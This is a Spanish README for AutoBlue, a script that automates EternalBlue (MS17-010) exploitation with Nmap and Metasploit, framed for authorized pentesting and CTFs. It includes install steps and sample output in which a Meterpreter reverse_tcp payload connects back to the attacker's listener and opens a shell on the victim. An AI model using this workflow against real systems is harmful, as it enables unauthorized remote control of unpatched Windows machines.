
AutoBlue - Herramienta automatizada de explotación de EternalBlue (CVE-2017-0144 / MS17-010) que utiliza Nmap y Metasploit para hacking ético, pruebas de penetración y desafíos CTF. ¡Estrictamente solo para uso autorizado y educativo!
AUTOBLUE es una herramienta de automatización diseñada para explotar la vulnerabilidad EternalBlue (CVE-2017-0144) en máquinas Windows. La herramienta integra el poder de Nmap para el escaneo de vulnerabilidades y msfconsole de Metasploit para la explotación, permitiendo a los usuarios identificar automáticamente sistemas vulnerables y lanzar el exploit EternalBlue para obtener acceso remoto al objetivo.
Esta herramienta está diseñada principalmente para profesionales de la seguridad, probadores de penetración y hackers éticos que trabajan en entornos controlados y autorizados, como desafíos Capture The Flag (CTF), compromisos de pruebas de penetración o configuraciones de laboratorio. AUTOBLUE permite a los usuarios explotar la vulnerabilidad EternalBlue con una intervención manual mínima, simplemente ingresando la dirección IP del objetivo.
Características
Escaneo Automatizado de Vulnerabilidades: Utiliza Nmap para escanear la vulnerabilidad EternalBlue (CVE-2017-0144) en la máquina objetivo.
Explotación Sin Problemas: Aprovecha msfconsole de Metasploit para lanzar el exploit EternalBlue automáticamente.
Configuración Sencilla: Solo requiere una dirección IP objetivo y un entorno de trabajo con Nmap y Metasploit instalados.
Informe de Salida: Genera una salida que indica el éxito o fracaso del intento de explotación.
Tabla de Contenidos
Requisitos Previos
Instalación
Uso
Cómo Funciona
Consideraciones de Seguridad
Contribuciones
Licencia
Agradecimientos
Descargo de Responsabilidad
Requisitos Previos:
Antes de usar AUTOBLUE, asegúrese de que las siguientes herramientas estén instaladas en su máquina:
Nmap: Una herramienta de escaneo de red para detectar máquinas vulnerables.
Metasploit Framework: Una plataforma de pruebas de penetración que incluye exploits para EternalBlue.
Instalar Nmap:
Copiar código
sudo apt update
y
sudo apt install nmap
En Windows o macOS, descargue Nmap desde el sitio web oficial.
Instalar Metasploit:
En Linux (basado en Debian):
Copiar código
sudo apt update
y
sudo apt install metasploit-framework
En Windows o macOS, descargue Metasploit desde el sitio web oficial.
Instalación:
Para instalar AUTOBLUE, siga estos pasos:
Clonar el repositorio:
git clone https://github.com/AtithKhawas/autoblue.git
y
cd autoblue
Asegúrese de que Nmap y Metasploit estén correctamente instalados como requisitos previos.
Hacer ejecutable el script:
chmod +x autoblue.sh
Uso:
AUTOBLUE está diseñado para automatizar el escaneo y la explotación de la vulnerabilidad EternalBlue. Aquí se explica cómo usarlo:
Para usar AUTOBLUE, ejecute el siguiente comando en su terminal:
Copiar código
./autoblue.sh
Salida:
┌──(root㉿kali)-[/home/Elliot]
└─# ./autoblue.sh
============================================
********************************************
AutoBlue - EternalBlue Exploit Automation
********************************************
********************************************
------------------------Made by ATITH KHAWAS
============================================
Enter Target IP Address:
Solicitará la dirección IP del objetivo y la suya.
Ejemplo
Enter Target IP Address: Target<IP Address>
Enter Your IP Address: Your <IP Address>
Una vez que ejecute la herramienta, comenzará a escanear con Nmap:
Salida-1
Target IP Address: ***.***.**.**
[+] Scanning Target for MS17-010 Vulnerability...
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
Nmap scan report for ***.***.**.**
Host is up (0.19s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
[+] Target is VULNERABLE to EternalBlue!
Aquí es donde comienza el verdadero trabajo, reduciendo significativamente el proceso que consume tiempo. Si el objetivo es vulnerable, lanza automáticamente Msfconsole y configura RHOSTS, PAYLOAD, LHOST y LPORT con el puerto predeterminado 4444.
Salida-2
[+] Launching Metasploit...
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
RHOSTS => ***.***.**.**
PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => ***.***.**.**
LPORT => 4444
[*] Started reverse TCP handler on ***.***.**.**:4444
Y nos proporciona la shell Meterpreter del objetivo.
Salida-3
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > pwd
C:\Windows\system32
Cómo Funciona:
Escaneo de Scripts de Nmap: La herramienta primero usa Nmap Script Scan (--script smb-vuln-ms17-010) para detectar si la máquina objetivo es vulnerable al exploit EternalBlue. Verifica si el puerto 445 está abierto e intenta identificar vulnerabilidades SMB.
Exploit de Metasploit: Si la máquina objetivo se encuentra vulnerable, AUTOBLUE procede a lanzar el exploit EternalBlue usando msfconsole de Metasploit. El script configurará y enviará el payload necesario para explotar la vulnerabilidad.
Shell Reversa: Si el exploit tiene éxito, se abrirá una shell reversa para proporcionar una interfaz de línea de comandos en la máquina víctima.
Retroalimentación: La herramienta proporciona retroalimentación durante todo el proceso, incluyendo si el objetivo fue explotado con éxito, y muestra cualquier información relevante (por ejemplo, dirección IP de la shell reversa).
Consideraciones de Seguridad:
Uso Legal: Esta herramienta solo debe usarse en entornos autorizados. Asegúrese de tener permiso explícito para probar la máquina objetivo y de que no sea ilegal hacerlo en su jurisdicción.
Entrada del Usuario: Asegúrese de que solo se ingresen IPs de confianza en la herramienta para evitar mal uso. Ejecutar esta herramienta en sistemas no confiables podría provocar incidentes de seguridad.
Seguridad del Payload: El payload de shell reversa utilizado en esta herramienta es inherentemente riesgoso. No exponga la máquina de ataque ni sus listeners a redes no confiables.
Mantenga las Dependencias Actualizadas: Asegúrese de actualizar regularmente Nmap y Metasploit para mitigar vulnerabilidades de seguridad conocidas en esas herramientas.
Contribuciones:
Las contribuciones al proyecto AUTOBLUE son bienvenidas. Si tiene alguna sugerencia, mejora o corrección de errores, no dude en bifurcar el repositorio y crear un pull request.
Licencia:
Esta herramienta es de código abierto y se distribuye bajo la Licencia MIT. Eres libre de usar, modificar y distribuir el software en tus propios proyectos. Sin embargo, debes incluir este aviso en todas las copias o partes sustanciales del software.
Agradecimientos:
Nmap: Por proporcionar la funcionalidad esencial de escaneo de vulnerabilidades.
Metasploit: Por suministrar el framework para explotar la vulnerabilidad EternalBlue.
Investigadores de Seguridad: Por descubrir y divulgar públicamente la vulnerabilidad EternalBlue, lo que ha ayudado a asegurar sistemas en todo el mundo.
Descargo de Responsabilidad:
AUTOBLUE es una herramienta destinada únicamente para uso educativo y ético. Los autores no son responsables de ninguna acción ilegal realizada con esta herramienta. Es su responsabilidad asegurarse de tener permiso explícito para realizar pruebas de penetración en cualquier sistema.
Use esta herramienta bajo su propio riesgo. Realice siempre actividades de pruebas de penetración en un entorno seguro y legal.